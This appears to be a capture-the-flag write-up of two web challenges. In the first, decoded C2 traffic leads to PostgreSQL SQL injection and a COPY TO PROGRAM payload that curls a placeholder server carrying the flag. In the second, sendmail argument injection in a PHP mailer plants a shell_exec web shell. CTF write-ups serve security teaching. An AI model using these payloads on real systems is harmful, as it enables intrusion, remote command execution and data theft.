Name: Debugger Unchained
Difficulty: Easy
Category: Web
Description:
Our SOC team has discovered a new strain of malware in one of the workstations. They extracted what looked like a C2 profile from the infected machine’s memory and exported a network capture of the C2 traffic for further analysis. To discover the culprits, we need you to study the C2 infrastructure and check for potential weaknesses that can get us access to the server.
In the zip file, we are given two files:
The c2.profile file looks like a profile that someone would use for their command and control server. Exploring the packet capture traffic.pcapng, we see that there is a lot of HTTP traffic. On further analysis, we see that there were requests to /assets/jquery-3.6.0.slim.min.js. Some were POST requests and some were GET requests.
Also, these requests include some special cookies: __cflb and __cfuid. These looked like some base64 encoded JSON.
I used tshark to extract the two cookies into seperate files with the following command.
Extract __cfuid cookie:
1tshark -r traffic.pcapng -Y 'http.cookie' -z 'proto,colinfo,http.cookie,http.cookie' | grep __cfuid | cut -d ';' -f 2 | sed 's/"//g' > __cfuid.txt
Extract __cflb cookie:
1tshark -r traffic.pcapng -Y 'http.cookie' -z 'proto,colinfo,http.cookie,http.cookie' | grep __cflb | cut -d ';' -f 1 | cut -d '"' -f 2 > __cflb.txt
I wrote a quick script to extract the contents of these base64 values.
1#!/usr/bin/env python3
2
3import json, base64
4import colorama
5
6lines = []
7with open('__cfuid.txt', 'r') as cfuid:
8 for line in cfuid.readlines():
9 lines.append(line.strip())
10
11def extract_info(line):
12 m0 = line.replace('__cfuid=','')
13 m0 = m0
14 m1 = base64.b64decode(m0)
15 id, output = (json.loads(m1)['id'], json.loads(m1)['output'])
16
17 m2 = base64.b64decode(output)
18 print(m2.decode())
19
20counter = 0
21for line in lines:
22 try:
23 extract_info(line)
24 counter += 1
25 except:
26 print(f'{colorama.Fore.RED}Counter {counter} failed{colorama.Fore.RESET}')
It looks like output from commands.
Another interesting thing that we found was that in the response to the GET requests, there was a parameter called task which included similar base64 encoded strings.
I used tshark again to extract these from the packet capture:
Checking these, we can see that it was actually used to send commands from the c2 server to the victim client.
The commands and outputs did not help much for now. While checking the responses, we saw that there were two Status 500 responses also.
It seems from the output that the application backend is using python’s Flask. Checking on the other 500 response message, it reveals more about the application.
Let’s copy the request to burpsuite and it to see it’s contents on our browser. We need to change the host to that of the challenge instance.
Use burpsuite’s show response in browser to view it comfortably in browser.
It can be seen that the value of output and task_id are directly being passed into the SQL query.
1db.execute(f"""INSERT INTO task_outputs(output, task_id) VALUES ('{output}', {id})""")
The cookie __cfuid is sending the following content:
So, if we include a SQLi payload in the cookie and send a POST request to that endpoint, we will be able to perform the injection. I used the hackvertor extension to encode the cookie in burp repeater. From enumerating the database with the sql injection, it was identified that they are using postgresql. The final payload was:
1{"id": 1, "output": "U3', 132454); copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`/readflag|base64`'-- -"}
Don’t forget to encode it to base64 if you’re not using this extension.
Â
Name: Letter Despair
Difficulty: Easy
Category: Web
Description:
A high-profile political individual was a victim of a spear-phishing attack. The email came from a legitimate government entity in a nation we don’t have jurisdiction. However, we have traced the originating mail to a government webserver. Further enumeration revealed an open directory index containing a PHP mailer script we think was used to send the email. We need access to the server to read the logs and find out the actual perpetrator. Can you help?
Visiting the challenge endpoint, we get a directory listing:
The mailer.zip contains the source code of the mailer.php page.
mailer.php
At first I thought that it was some file upload vulnerability by looking at the attachment feature. But looking through the source code, it wasn’t the case. Even so, I ran the page locally with php server to see where the uploaded file is stored. Then I saw something on the server logs.
It was calling out sendmail. Sendmail is a CLI tool which is used to send emails. I installed sendmail and used pspy to see the command line used to run the binary.
It looks like the From Email parameter is directly being passed in to the shell command. This looks like an interesting injection point. I tried performing injections with characters such as && and ; but these were escaped properly. I searched online and saw that there were many known exploits for PHP sendmail command injection. I came across this one https://www.exploit-db.com/exploits/40970. Here, they were able to pass additional flag parameters onto the command using -oQ /tmp -X/var/www/cache/phpcode.php. It basically stores the log which contains the contents of the email and saves locally to a file at /var/www/cache/phpcode.php.
Simillarly, I tried with the following payload:Â From Email:
1rel[email protected] -OQueueDirectory=/tmp -X/var/www/html/cmd.php
Subject:
1<?php echo shell_exec($_GET['cmd']);?>
This will create a file at /var/www/html/cmd.php that will contain the php code at subject. We can then use it as a webshell to run commands on the server.
